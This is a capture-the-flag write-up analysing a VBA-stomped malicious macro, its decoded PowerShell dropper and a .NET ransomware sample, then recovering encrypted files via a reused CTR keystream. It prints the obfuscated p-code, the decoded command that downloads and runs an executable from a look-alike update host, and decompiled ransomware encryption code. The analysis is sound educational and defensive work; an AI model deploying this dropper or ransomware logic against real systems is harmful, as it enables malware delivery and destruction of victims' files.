' 	LitDI2 0x0003 
' 	ArgsLd Left 0x0002 
' 	St retrieve 
' Line #16:
' 	EndFunc 
' Line #17:
' Line #18:
' 	FuncDefn (Function perceive(deceive))
' Line #19:
' 	Ld deceive 
' 	Ld deceive 
' 	FnLen 
' 	LitDI2 0x0003 
' 	Sub 
' 	ArgsLd Right 0x0002 
' 	St perceive 
' Line #20:
' 	EndFunc 
' Line #21:
' Line #22:
' 	FuncDefn (Function receive(conceive))
' Line #23:
' 	Do 
' Line #24:
' 	Ld grieve 
' 	Ld conceive 
' 	ArgsLd retrieve 0x0001 
' 	ArgsLd achieve 0x0001 
' 	Add 
' 	St grieve 
' Line #25:
' 	Ld conceive 
' 	ArgsLd perceive 0x0001 
' 	St conceive 
' Line #26:
' 	Ld conceive 
' 	FnLen 
' 	LitDI2 0x0000 
' 	Gt 
' 	LoopWhile 
' Line #27:
' 	Ld grieve 
' 	St receive 
' Line #28:
' 	EndFunc 
' Line #29:
' Line #30:
' 	FuncDefn (Function MyMacro())
' Line #31:
' 	Dim 
' 	VarDefn thieve (As String)
' Line #32:
' 	Dim 
' 	VarDefn sleeve (As String)
' Line #33:
' Line #34:
' 	LitStr 0x0306 "128127135117130131120117124124048056089126134127123117061103117114098117129133117131132048055120132132128074063063134134121126116127135131133128116113132117062115127125074072064072064063133128116113132117055048061101131117082113131121115096113130131121126119048061088117113116117130131048080139055120117113130132114117113132055077055073072072069114072064064070067114114071114113071068118071069114070118072113118118066073065114115073065115118113072117114071071116073068066116068067067115073065071072113113073117073073115070118055141048061095133132086121124117048055083074108103121126116127135131108100113131123131108083120130127125117101128116113132117062117136117055057075048083074108103121126116127135131108100113131123131108083120130127125117101128116113132117062117136117"
' 	St thieve 
' Line #35:
' 	Ld thieve 
' 	ArgsLd receive 0x0001 
' 	St sleeve 
' Line #36:
' 	Ld sleeve 
' 	Ld reprieve 
' 	Ld naive 
' 	Ld believe 
' 	LitStr 0x0027 "103121126067066111096130127115117131131"
' 	ArgsLd receive 0x0001 
' 	LitStr 0x001B "135121126125119125132131074"
' 	ArgsLd receive 0x0001 
' 	ArgsLd GetObject 0x0001 
' 	ArgsMemLd Get 0x0001 
' 	ArgsMemCall Create 0x0004 
' Line #37:
' Line #38:
' 	EndFunc 
' Line #39:        

P-code is the compiled form of the VBA source. Office stores both in the module stream and normally executes the p-code, only recompiling from the source text when the Office version doesn't match the one that compiled it. VBA stomping abuses exactly that: the source text is overwritten with something harmless (or blanked) while the malicious p-code is left in place, so anything that only reads the source, including olevba's default output, sees nothing. The dump above is what olevba's --pcode option prints (it disassembles the p-code with pcodedmp). There is a tool (pcode2code) that can decompile the bytecode back to VBA, though, due to the method we used to investigate, we don't need it in practice. I still did it anyway to confirm, though! If we use that tool, we get code that looks identical to the first pattern we investigated, where we decode it via the receive function we ported to VB.NET. If we decode it...

powershell (Invoke-WebRequest 'http://vvindowsupdate.com:8080/update' -UseBasicParsing -Headers @{'heartbeat'='9885b80063bb7ba74f75b6f8aff291bc91cfa8eb77d942d433c9178aa9e99c6f'} -OutFile 'C:\Windows\Tasks\ChromeUpdate.exe'); C:\Windows\Tasks\ChromeUpdate.exe
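The obfuscation the p-code implements is small enough to port in a few lines, so here is an added Python version (mine, not the write-up's VB.NET port). Reading the disassembly: achieve is Chr(n - 16), retrieve takes the first three characters, perceive drops them, and receive loops until the string is consumed, so every three decimal digits encode one character offset by 16. Running it over the three LitStr literals in the dump gives the PowerShell command plus the two strings around it, which the trailing GetObject / Get / Create sequence uses as GetObject("winmgmts:").Get("Win32_Process").Create(...) to launch the command through WMI rather than Shell. Note that the literal on the page decodes to a plain http:// URL.

```python
# Added example: Python port of the receive()/achieve()/retrieve()/perceive()
# routine seen in the p-code. Every 3-digit group is ord(char) + 16.


def receive(encoded: str) -> str:
    """Decode a string of 3-digit groups, each being ord(char) + 16."""
    if len(encoded) % 3:
        raise ValueError("encoded length must be a multiple of 3")
    return "".join(chr(int(encoded[i:i + 3]) - 16) for i in range(0, len(encoded), 3))


def encode(plain: str) -> str:
    """Inverse of receive(); handy for building detection test cases."""
    return "".join(f"{ord(ch) + 16:03d}" for ch in plain)


# The three LitStr literals from the p-code dump above, copied verbatim
# (the long one is split into adjacent string literals for readability).
WMI_NAMESPACE = "135121126125119125132131074"
WMI_CLASS = "103121126067066111096130127115117131131"
COMMAND = (
    "128127135117130131120117124124048"
    "056089126134127123117061103117114098117129133117131132048"
    "055120132132128074063063134134121126116127135131133128116113132117062115127125074072064072064063133128116113132117055048"
    "061101131117082113131121115096113130131121126119048"
    "061088117113116117130131048"
    "080139055120117113130132114117113132055077055"
    "073072072069114072064064070067114114071114113071068118071069114070118072113118118066073065114115073065115118113072117114071071116073068066116068067067115073065071072113113073117073073115070118"
    "055141048061095133132086121124117048055083074108103121126116127135131108100113131123131108083120130127125117101128116113132117062117136117055057075048083074108103121126116127135131108100113131123131108083120130127125117101128116113132117062117136117"
)


def decode_macro() -> dict:
    """Decode everything MyMacro builds before the WMI call."""
    return {
        "namespace": receive(WMI_NAMESPACE),
        "class": receive(WMI_CLASS),
        "command": receive(COMMAND),
    }


if __name__ == "__main__":
    for name, value in decode_macro().items():
        print(f"{name}: {value}")
```

Because the scheme is a fixed offset with no key, the encoder is as useful as the decoder: encode("powershell") gives the digit prefix you can grep for across the rest of the corpus to find any other document using the same dropper generator.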

If we try to access this URL with the heartbeat header set, we actually get something! Two things, in fact. First, we get the ChromeUpdate.exe file which, as you might expect, is not the application for updating Chrome. We also get a flag!

flag{734b55458dc74fb6d5f5a5082a3920d6}

Part 2

So let's crack open that file we downloaded.

Luckily, .NET is my specialty, so reverse engineering this application shouldn't be a problem. That and decompilation tools are abundant. If we use strings on the file, we find a bunch that point to .NET Core.

...
RansomwareUsingAES-CTR.runtimeconfig.json
RansomwareUsingAES-CTR.dll
!System.Collections.Concurrent.dll
 System.Collections.Immutable.dll
!System.Diagnostics.StackTrace.dll
System.IO.Compression.dll
System.IO.MemoryMappedFiles.dll
System.Private.CoreLib.dll
System.Reflection.Metadata.dll
 System.Security.Cryptography.dll
 RansomwareUsingAES-CTR.deps.json        

What's interesting here is that the exe carries a dll of the same name, which makes this a .NET single-file bundle: the managed assembly is packed inside a native host exe. Let's first use ILSpy to open the file.

Note: I had called it stuff.dll at the time

If we right-click RansomwareUsingAES-CTR, we can Extract Package Assembly, then load it right back in. Here's the relevant code:

	private static void Main()
	{
		List<FileInfo> list = new List<FileInfo>();
		FileEnumeration("C:\\Users\\lenovo\\Desktop\\FilesToEncrypt", list);
		byte[] array = Generate128BitsOfRandomEntropy();
		byte[] bytes = Encoding.UTF8.GetBytes("n0nc3FTW");
		ulong num = 0uL;
		foreach (FileInfo item in list)
		{
			Encrypt(item.FullName, array, bytes, num);
		}
		GenerateFlag(bytes);
	}

	private static string GenerateFlag(byte[] P_0)
	{
		Array.Reverse(P_0);
		byte b = 66;
		for (int i = 0; i < P_0.Length; i++)
		{
			P_0[i] ^= b;
		}
		using MD5 mD = MD5.Create();
		string text = BitConverter.ToString(mD.ComputeHash(P_0)).Replace("-", "").ToLower();
		return "flag{" + text + "}";
	}        

If we take all of the decompiled code, make some modifications, and dotnet run it, we get our next flag! flag{9335fd733e24164c98b741e49ec064c3}

Part 3

Crypto...

My mortal enemy! Crypto! The zip file contains a bunch of encrypted files. There's a big hint in the description, though. The CTF logo is the plaintext of one of the encrypted files. Take my word for it that, after downloading nahamcon.png and comparing the size to the encrypted file nahamcon.EXTEN, the sizes are identical! This is also an indirect hint that there's no padding going on during the encryption, incidentally.

Said logo

Here's some of the Main code again, including the stuff I didn't paste earlier.

	private static void Encrypt(string P_0, byte[] P_1, byte[] P_2, ulong P_3)
	{
		try
		{
			string path = Path.GetDirectoryName(P_0) + "\\" + Path.GetFileName(P_0).Replace(Path.GetExtension(P_0), ".EXTEN");
			ICryptoTransform cryptoTransform = new AesCounterMode(P_2, P_3).CreateEncryptor(P_1, null);
			byte[] array = new byte[0];
			using (Stream stream = File.OpenRead(P_0))
			{
				using MemoryStream memoryStream = new MemoryStream();
				stream.CopyTo(memoryStream);
				array = memoryStream.ToArray();
			}
			byte[] array2 = new byte[array.Length];
			cryptoTransform.TransformBlock(array, 0, array.Length, array2, 0);
			File.WriteAllBytes(path, array2);
		}
		catch (Exception)
		{
		}
	}

	private static void Main()
	{
		List<FileInfo> list = new List<FileInfo>();
		FileEnumeration("C:\\Users\\lenovo\\Desktop\\FilesToEncrypt", list);
		byte[] array = Generate128BitsOfRandomEntropy();
		byte[] bytes = Encoding.UTF8.GetBytes("n0nc3FTW");
		ulong num = 0uL;
		foreach (FileInfo item in list)
		{
			Encrypt(item.FullName, array, bytes, num);
		}
		GenerateFlag(bytes);
	}

	private static byte[] Generate128BitsOfRandomEntropy()
	{
		byte[] array = new byte[16];
		RandomNumberGenerator.Create().GetBytes(array);
		return array;
	}        

The code generates 16 random bytes (a 128-bit AES key) once, and that key could have been a problem: it never leaves the victim machine, so we can't recover it. The big detail here is that the nonce ("n0nc3FTW") and the starting counter (0) are constants, and a new AesCounterMode is instantiated for each file with the same key, nonce and counter, so the keystream starts over from block 0 for every file. It's a decent hint that whatever we can figure out from our one plaintext/ciphertext pair, we can use across the rest of the files.

Here's a slightly trimmed down version of AesCounterMode, which is also a part of the application.

public class AesCounterMode : SymmetricAlgorithm
{
	private readonly ulong _nonce;
	private readonly ulong _counter;
	private readonly AesManaged _aes;

	public AesCounterMode(byte[] P_0, ulong P_1)
		: this(ConvertNonce(P_0), P_1)
	{
	}

	public AesCounterMode(ulong P_0, ulong P_1)
	{
		_aes = new AesManaged
		{
			Mode = CipherMode.ECB,
			Padding = PaddingMode.None
		};
		_nonce = P_0;
		_counter = P_1;
	}

	private static ulong ConvertNonce(byte[] P_0) => ..;

	public override ICryptoTransform CreateEncryptor(byte[] P_0, byte[] P_1)
	{
		return new CounterModeCryptoTransform(_aes, P_0, _nonce, _counter);
	}
}        

Even though the name of the application says AES-CTR, the inner AesManaged is configured for ECB with no padding. That isn't a mistake: CTR mode is built by running the block cipher in raw (ECB) mode over a counter block and XORing the output with the data, and AesManaged has no native CTR mode, so this is the usual way to hand-roll it. The part that matters is the CounterModeCryptoTransform that does the XOR -- also a part of the application. Let's take a gander. Unfortunately, it's a bit long.

public class CounterModeCryptoTransform : ICryptoTransform, IDisposable
{
	private readonly byte[] _nonceAndCounter;
	private readonly ICryptoTransform _counterEncryptor;
	private readonly Queue<byte> _xorMask = new Queue<byte>();
	private readonly SymmetricAlgorithm _symmetricAlgorithm;
	private ulong _counter;
	private byte[] _counterModeBlock;

	public CounterModeCryptoTransform(SymmetricAlgorithm P_0, byte[] P_1, ulong P_2, ulong P_3)
	{
		if (P_1 == null)
		{
			throw new ArgumentNullException("key");
		}
		_symmetricAlgorithm = P_0 ?? throw new ArgumentNullException("symmetricAlgorithm");
		_counter = P_3;
		_nonceAndCounter = new byte[16];
		BitConverter.TryWriteBytes(_nonceAndCounter, P_2);
		BitConverter.TryWriteBytes(new Span<byte>(_nonceAndCounter, 8, 8), P_3);
		byte[] rgbIV = new byte[_symmetricAlgorithm.BlockSize / 8];
		_counterEncryptor = P_0.CreateEncryptor(P_1, rgbIV);
	}

	public int TransformBlock(byte[] P_0, int P_1, int P_2, byte[] P_3, int P_4)
	{
		for (int i = 0; i < P_2; i++)
		{
			if (NeedMoreXorMaskBytes())
			{
				EncryptCounterThenIncrement();
			}
			byte b = _xorMask.Dequeue();
			P_3[P_4 + i] = (byte)(P_0[P_1 + i] ^ b);
		}
		return P_2;
	}

	private bool NeedMoreXorMaskBytes()
	{
		return _xorMask.Count == 0;
	}

	private void EncryptCounterThenIncrement()
	{
		if (_counterModeBlock == null)
		{
			_counterModeBlock = new byte[_symmetricAlgorithm.BlockSize / 8];
		}
		_counterEncryptor.TransformBlock(_nonceAndCounter, 0, _nonceAndCounter.Length, _counterModeBlock, 0);
		IncrementCounter();
		byte[] counterModeBlock = _counterModeBlock;
		foreach (byte item in counterModeBlock)
		{
			_xorMask.Enqueue(item);
		}
	}

	private void IncrementCounter()
	{
		_counter++;
		BitConverter.TryWriteBytes(new Span<byte>(_nonceAndCounter, 8, 8), _counter);
	}
}        

Since ILSpy didn't really give good parameter names, and I'm too lazy to translate it myself, here are some notes (and red herrings):

  • The 16-byte counter block is the 8-byte nonce (n0nc3FTW, converted to a ulong) followed by an 8-byte counter that starts at 0, both written little-endian by BitConverter.
  • The AES-ECB encryptor we passed in encrypts that counter block under the random key to produce 16 keystream bytes, and then the counter is incremented.
  • Each keystream byte is XOR'd with one plaintext byte; with no padding, the ciphertext is exactly the size of the plaintext.

My first thought was that we can XOR the plaintext and ciphertext to get the set of AES-ECB encrypted bytes. I was then hoping that, since this is the result of encrypting a known value (the counter) multiple times, the random key could somehow be derived. Aside from brute-forcing, which isn't really feasible, research suggests this is impossible and that usual attacks on ECB require chosen-plaintexts (we only have known).

I mentioned earlier that the same encryption process is performed anew for each file. I didn't realize this initially, hence why I went down the wrong path. Put another way, the set of bytes that gets XOR'd with the plaintext is the same for each and every file. What we effectively have is a one-time pad that was reused, and a reused pad falls to a single known plaintext: XORing the logo with its ciphertext hands us the keystream. And a bit more good news: our known plaintext and ciphertext are the largest files of the bunch, so the recovered keystream covers every other file in full. Here's the code in C# to do it:

// Known plaintext (the CTF logo) and its ciphertext from the zip.
byte[] origImg = File.ReadAllBytes(@"J:\Randodev\ctrwut\nahamcon.png");
byte[] encImg = File.ReadAllBytes(@"J:\Randodev\ctrwut\encfiles\nahamcon.EXTEN");

// plaintext XOR ciphertext = the keystream the binary reused for every file.
byte[] oneTimePad = origImg.ToArray();
for (int i = 0; i < oneTimePad.Length; i++)
{
    oneTimePad[i] ^= encImg[i];
}

//Directory.Delete(@"J:\Randodev\ctrwut\encfiles\results", recursive: true);
Directory.CreateDirectory(@"J:\Randodev\ctrwut\encfiles\results");

foreach (string encFilePath in Directory.GetFiles(@"J:\Randodev\ctrwut\encfiles\"))
{
    byte[] origData = File.ReadAllBytes(encFilePath);

    // The logo is the largest file, so the pad covers every byte of every
    // other file; Math.Min guards the loop in case a longer file shows up.
    int n = Math.Min(origData.Length, oneTimePad.Length);
    for (int i = 0; i < n; i++)
    {
        origData[i] ^= oneTimePad[i];
    }

    File.WriteAllBytes($@"J:\Randodev\ctrwut\encfiles\results\{Path.GetFileNameWithoutExtension(encFilePath)}.unenc", origData);
}
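To show why the per-file restart is fatal regardless of how good the block cipher is, here is an added Python example (mine, not the challenge binary's code) that models the flaw end to end: a keystream derived from (key, nonce, counter) that restarts at counter 0 for every file, a known plaintext/ciphertext pair used to recover that keystream, and the recovered keystream applied to the other ciphertexts. AES-ECB is replaced by a SHA-256-based stand-in so the block runs on the standard library alone; the recovery logic does not depend on that choice. The files, key and nonce handling are constructed for the example, and unlike the C# above it also handles the case where a target is longer than the known plaintext, of which only the prefix is recoverable.

```python
import hashlib
import os
import struct
from typing import Dict, Tuple

BLOCK = 16


def keystream_block(key: bytes, nonce: int, counter: int) -> bytes:
    """Stand-in for AES-ECB(key, nonce || counter).

    The binary writes an 8-byte nonce and 8-byte counter little-endian
    (BitConverter); SHA-256 truncated to 16 bytes replaces AES here so the
    example needs no third-party crypto library.
    """
    counter_block = struct.pack("<QQ", nonce, counter)
    return hashlib.sha256(key + counter_block).digest()[:BLOCK]


def ctr_xor(key: bytes, nonce: int, counter: int, data: bytes) -> bytes:
    """CTR as CounterModeCryptoTransform does it: encrypt the counter block,
    increment, XOR. The same function encrypts and decrypts."""
    out = bytearray()
    for off in range(0, len(data), BLOCK):
        ks = keystream_block(key, nonce, counter)
        counter += 1
        out.extend(a ^ b for a, b in zip(data[off:off + BLOCK], ks))
    return bytes(out)


def recover_keystream(known_plain: bytes, known_cipher: bytes) -> bytes:
    """Known-plaintext attack on a reused keystream: P XOR C = keystream."""
    n = min(len(known_plain), len(known_cipher))
    return bytes(p ^ c for p, c in zip(known_plain[:n], known_cipher[:n]))


def decrypt_with_keystream(keystream: bytes, cipher: bytes) -> Tuple[bytes, int]:
    """Returns (recovered prefix, number of trailing bytes the keystream does not cover)."""
    n = min(len(keystream), len(cipher))
    return bytes(k ^ c for k, c in zip(keystream[:n], cipher[:n])), len(cipher) - n


def demo() -> Dict[str, Tuple[bool, int]]:
    """Encrypt constructed files the way the binary does, then break them."""
    key = os.urandom(16)                              # Generate128BitsOfRandomEntropy()
    nonce = int.from_bytes(b"n0nc3FTW", "little")     # the constant nonce, as a ulong
    files = {
        "logo.png": b"\x89PNG\r\n\x1a\n" + bytes(range(256)) * 4,   # constructed "known" file, 1032 bytes
        "notes.txt": b"nothing flaggy here, move along\n",
        "big.bin": os.urandom(1500),                                 # longer than the known file
    }
    # The flaw: every file gets a fresh transform with the same key, nonce and counter=0.
    enc = {name: ctr_xor(key, nonce, 0, data) for name, data in files.items()}

    ks = recover_keystream(files["logo.png"], enc["logo.png"])
    results = {}
    for name, cipher in enc.items():
        plain, missing = decrypt_with_keystream(ks, cipher)
        results[name] = (plain == files[name][:len(plain)], missing)
    return results


if __name__ == "__main__":
    for name, (ok, missing) in demo().items():
        print(f"{name:10} recovered={ok} uncovered_bytes={missing}")
```

The fix on the encryption side is equally mechanical: a fresh random nonce per file, stored next to the ciphertext, makes every file's keystream distinct, and recovering one keystream then tells you nothing about the others.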

Using the file command, most files turned out to be plain text and images. The text files had nothing flaggy. I used the oldie but goodie IrfanView to view the image files, which were a mix of formats; we don't have the original extensions, and IrfanView doesn't care. One image is this absolutely adorable flag carrier!

flag{fd2a43e7095c16685e86567f20f2eca5}

And there's our third and final flag!


More articles by Tim M.
